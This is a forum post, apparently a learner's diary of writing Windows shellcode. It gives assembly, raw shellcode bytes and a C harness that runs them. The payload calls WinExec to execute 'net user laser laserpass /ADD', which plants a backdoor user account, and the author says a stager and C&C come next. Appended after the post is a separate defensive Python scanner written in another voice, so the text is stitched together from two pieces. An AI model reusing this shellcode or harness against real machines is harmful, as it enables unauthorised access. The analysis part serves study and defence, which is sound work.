Thread: My shellcode trial and error diary

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010


    I'm trying to learn how to write shellcode. I'm planning on writing my trials and errors in some type of diary,
    and hopefully it can help others.

    The software that I'm using is Borland C++ with the CodeBlocks IDE (TASM), on Windows Server 2k3.

    Using the WinExec function, passing the parameters WinExec("cmd.exe /c net user laser laserpass /ADD", 0);
    IDA disassembly:

    asm xor esi, esi;
    asm push esi;
    asm mov esi, 0x4444412F;    // This group of asm is the string "cmd.ex....", written from the right side to the left.
    asm push esi;               // After moving 4 characters into esi, esi gets pushed onto the stack to be read later.
    asm mov esi, 0x20737361;    // We have to take along all the data that the shellcode will need, which stops us from
    asm push esi;               // just declaring char string[50] = "cmd....".
    asm mov esi, 0x70726573;
    asm push esi;
    asm mov esi, 0x616C2072;
    asm push esi;
    asm mov esi, 0x6573616C;
    asm push esi;
    asm mov esi, 0x20726573;
    asm push esi;
    asm mov esi, 0x75207465;
    asm push esi;
    asm mov esi, 0x6E20632F;
    asm push esi;
    asm mov esi, 0x20657865;
    asm push esi;
    asm mov esi, 0x2E646D63;
    asm push esi;
    asm mov ecx, esp;           // Placing the string directly into the first parameter of WinExec (#2) results in it trying
                                // to find the instruction or data at the address of the string (0x2E646D63) rather than at 0012FF7C.
                                // By copying the stack pointer into ecx, we will be able to reference it later.
    asm xor eax, eax;
    asm push eax;               // This part zeros out eax and pushes it onto the stack at 0012FF78, for the second parameter.
    asm mov ebx, ecx;           // This moves the old stack pointer (above) into ebx and pushes that as the first parameter:
    asm push ebx;               // 0012FF74 dd    12FF7Ch
    asm mov ebx, 0x77ea411e;    // Kernel32 is in all Windows programs; searching with a disassembler, the address of WinExec is
    asm call ebx;               // at 0x77ea411e. If you create a program that calls WinExec in C, the function will show
                                // up in the functions table.

    0012FF54 dd    407116h ; __create_lock+62
    0012FF58 dd    40BDB0h ; .data:CriticalSection
    0012FF5C dd    12FF90h ; Stack[00000A48]:retaddr
    0012FF60 dd    406C8Bh ; sub_406C7C+F
    0012FF64 dd    40BD90h ; .data:___exit_lock
    0012FF68 dd    40AC68h ; .data:aCreatingAtexit
    0012FF6C dd    406BA5h ; __init_exit_proc:loc_406BA5
    0012FF70 dd          0
    0012FF74 dd    12FF7Ch
    0012FF78 dd          0
    0012FF7C dd  2E646D63h ; cmd.
    0012FF80 dd    657865h ; exe
    0012FF84 dd    4090DCh ; .data:off_4090DC
    0012FF88 dd  7FFD4000h
    0012FF8C saved_fp dd    12FFB8h ; Stack[00000A48]:saved_fp
    0012FF90 retaddr dd    406E02h ; __startup+172
    0012FF94 argc dd 1
    To test the shellcode, a C program like the one below:

    #include <stdio.h>

    int main(void) {

        /* Raw bytes of the function above, as extracted from the compiled binary */
        char scode[] = "\x56\x33\xf6\x56"
        "\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\xbe\x73\x65\x72"
        "\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\x65\x56\xbe\x73\x65\x72\x20\x56"
        "\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\xbe\x65\x78\x65\x20\x56\xbe\x63"
        "\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\xdb\x8b\xd9\x53\x33\xdb\xbb\x1e"
        "\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\x5b\x5d\xc3\x90";

        int (*func)();
        func = (int (*)()) scode;   /* treat the byte buffer as a function */
        func();                     /* jump into the shellcode */
        return 0;
    }

    My next project will be a stager and C&C, so I can pass the shellcode above to get executed.
    Last edited by pigtail; 01-24-2010 at 11:57 PM. Reason: Readability edit
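Read the other way round, an analyst triaging a sample like this wants to recover the embedded command line and the hardcoded WinExec address from the bytes without running them. The Python below is an added example, not code from the post: it pattern-matches the mov esi, imm32 / push esi and mov ebx, imm32 / call ebx sequences described above, using the post's own byte string as sample input, and reverses the push order to rebuild the string as it would lie on the stack. The scanner and its function name are assumptions of this example, not the author's.

```python
import struct

# Sample: the post's byte string above (WinExec stub), extraction artefacts removed.
SAMPLE = bytes.fromhex(
    "5633f656be2f41444456be6173732056be736572"
    "7056be72206c6156be6c61736556be7365722056"
    "be6574207556be2f63206e56be6578652056be63"
    "6d642e5633f68bcc33c05033db8bd95333dbbb1e"
    "41ea77ffd333db33c033c05e5b5dc390"
)

def extract_push_strings(code: bytes):
    """Return (strings, targets): strings built by 'mov esi, imm32 / push esi'
    as they lie in stack memory, and imm32 addresses reached via 'mov ebx,
    imm32 / call ebx'. Triage pattern matcher, not a disassembler."""
    esi = ebx = None                        # last known immediate per register
    chunks, strings, targets = [], [], []   # chunks: dwords pushed, in push order
    def flush():
        # The stack grows downward, so the first dword pushed sits highest in
        # memory: reversing push order recovers the in-memory byte order.
        if chunks:
            mem = b"".join(struct.pack("<I", d) for d in reversed(chunks))
            text = mem.split(b"\0", 1)[0]
            if text:
                strings.append(text.decode("ascii", "replace"))
            chunks.clear()

    i = 0
    while i < len(code):
        op = code[i]
        if op in (0xBE, 0xBB) and i + 5 <= len(code):   # mov esi/ebx, imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            esi, ebx = (imm, ebx) if op == 0xBE else (esi, imm)
            i += 5
        elif code[i:i + 2] == b"\x33\xf6":              # xor esi, esi
            esi, i = 0, i + 2
        elif op == 0x56 and esi is not None:            # push esi
            chunks.append(esi)
            i += 1
        elif code[i:i + 2] == b"\xff\xd3":              # call ebx
            flush()
            if ebx is not None:
                targets.append(ebx)
            i += 2
        else:                          # unknown byte: skip, ends any string
            flush()
            i += 1
    flush()
    return strings, targets
```

Because the scanner only advances one byte past anything it does not recognise, it can misalign on other instructions with immediates; for real samples feed it the output of a proper disassembler or extend the opcode table.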
